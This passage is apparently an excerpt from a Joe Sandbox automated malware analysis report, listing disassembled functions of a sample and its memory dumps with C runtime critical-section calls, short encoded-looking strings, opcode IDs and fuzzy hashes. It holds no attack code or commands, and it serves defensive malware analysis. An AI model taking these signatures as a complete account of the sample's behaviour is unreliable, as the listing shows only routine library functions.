                        • __Init_thread_footer.LIBCMT ref: 00407EEE
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: G@ZK$[@G_
                        • API String ID: 2296764815-2338778587
                        • Opcode ID: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                        • Instruction ID: 86c78c31387f24dba649c5f85d45a7e4d1f1fe09f4149f0eb9c238fce71b3fdb
                        • Opcode Fuzzy Hash: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                        • Instruction Fuzzy Hash: D601D6F0F05244DBD720DBA9AC41A6AB7B0AB09304F9005BAF51977792DA396C41CB49
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 04958755
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: G@ZK$[@G_
                        • API String ID: 4132704954-2338778587
                        • Opcode ID: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                        • Instruction ID: b6d9e5f69eea9796bea2d87498c86624bd5840650b0f6347fdc5e806259f9cb9
                        • Opcode Fuzzy Hash: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                        • Instruction Fuzzy Hash: 4D01D6B0F00244DFDB10EFB8AC41969B7B0A759314BB00679D936AB2A0DB75B9058B45
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 04958155
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: G@ZK$[@G_
                        • API String ID: 4132704954-2338778587
                        • Opcode ID: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                        • Instruction ID: 70e303a494107c807b5c4bbdc7990226a0e9e82326240ab6145931cc99123ab7
                        • Opcode Fuzzy Hash: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                        • Instruction Fuzzy Hash: 0001D6F1F41204DBE720EFA8AC41A69B7B0AB59314FB006B9E91957370DB3568458B45
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00407899
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: @G@K$A@K.
                        • API String ID: 2296764815-2457859030
                        • Opcode ID: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                        • Instruction ID: 02867bdc75deabfbdae8ac7f1914e191d6f0b036ba1bc0e64f50d331b9525a60
                        • Opcode Fuzzy Hash: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                        • Instruction Fuzzy Hash: 94016271F042049BC710DF58E946A58B7B0EB48304F60417BE906A7392D779AE418B5D
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004079A9
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: @G@K$ZYA.
                        • API String ID: 2296764815-4236202813
                        • Opcode ID: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                        • Instruction ID: d8be7bc43f2ac3a424769131d28bfe1308d6783f1b1820d008cdb8cd51ef09c0
                        • Opcode Fuzzy Hash: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                        • Instruction Fuzzy Hash: D3018174F04248DFCB24EFA8E992A5CBBB0AB04300F90417BE915A7392D6786D01CB5D
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00406E39
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: ZF\K$three
                        • API String ID: 2296764815-3094064056
                        • Opcode ID: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                        • Instruction ID: 29344792781c46cc919c6541bc41426b34b2da4dd82bbb0e7b349b67a9b0c42f
                        • Opcode Fuzzy Hash: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                        • Instruction Fuzzy Hash: DF01D134F04204DBCB20DFA9E882B9CB3B0EB04314FA0017AED06A7391DA385D42DB4D
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 049570A0
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: ZF\K$three
                        • API String ID: 4132704954-3094064056
                        • Opcode ID: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                        • Instruction ID: 60cf2a7dc68a29c70edabd6d98aedb78c32db83a2db6c897080f8ef949d90416
                        • Opcode Fuzzy Hash: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                        • Instruction Fuzzy Hash: BF016974F04208EBDB20DFE9E981B4CB3B0AB54754FB041BADD15A73A0D6746A06DB19
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 04957B00
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: @G@K$A@K.
                        • API String ID: 4132704954-2457859030
                        • Opcode ID: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                        • Instruction ID: 38221bc8e8a54746fba994961db8364b5d67c5f54a5ce43662c162bd3be8d830
                        • Opcode Fuzzy Hash: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                        • Instruction Fuzzy Hash: 320181B0F00204DFD720DFA8E946A5C77B0E749304FB001BADD16A73A0D775AA458B59
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 04957C10
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: @G@K$ZYA.
                        • API String ID: 4132704954-4236202813
                        • Opcode ID: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                        • Instruction ID: 1213575038c523a82ef544637b8d7b5647d95631f7cf84cebd34dcb3e32a8c94
                        • Opcode Fuzzy Hash: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                        • Instruction Fuzzy Hash: CF018174F00304DFDB24EFA8E991A5C7BF0AB44314FA041BADD2557360D6757945CB49
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00406C99
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: CGV.$mix
                        • API String ID: 2296764815-1644454629
                        • Opcode ID: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                        • Instruction ID: 24033b3836d6b4f620cd462d172ded2aeb793c2235c3ef6269eb5d899298d204
                        • Opcode Fuzzy Hash: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                        • Instruction Fuzzy Hash: 2AF062B0F082049BDB10EBA9E982E5877A0AB45314FA4017AE906A77D2D6386D418B5D
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 04956F00
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: CGV.$mix
                        • API String ID: 4132704954-1644454629
                        • Opcode ID: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                        • Instruction ID: 0ace2dae8a327e575a5f5fe3e1d4c52e27c4eb285322fb79163cc70e8265dc82
                        • Opcode Fuzzy Hash: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                        • Instruction Fuzzy Hash: 70F096B0F44204DBDB10EFA8F942E5C77E0AB45324FF00175ED06973A0D63479458B59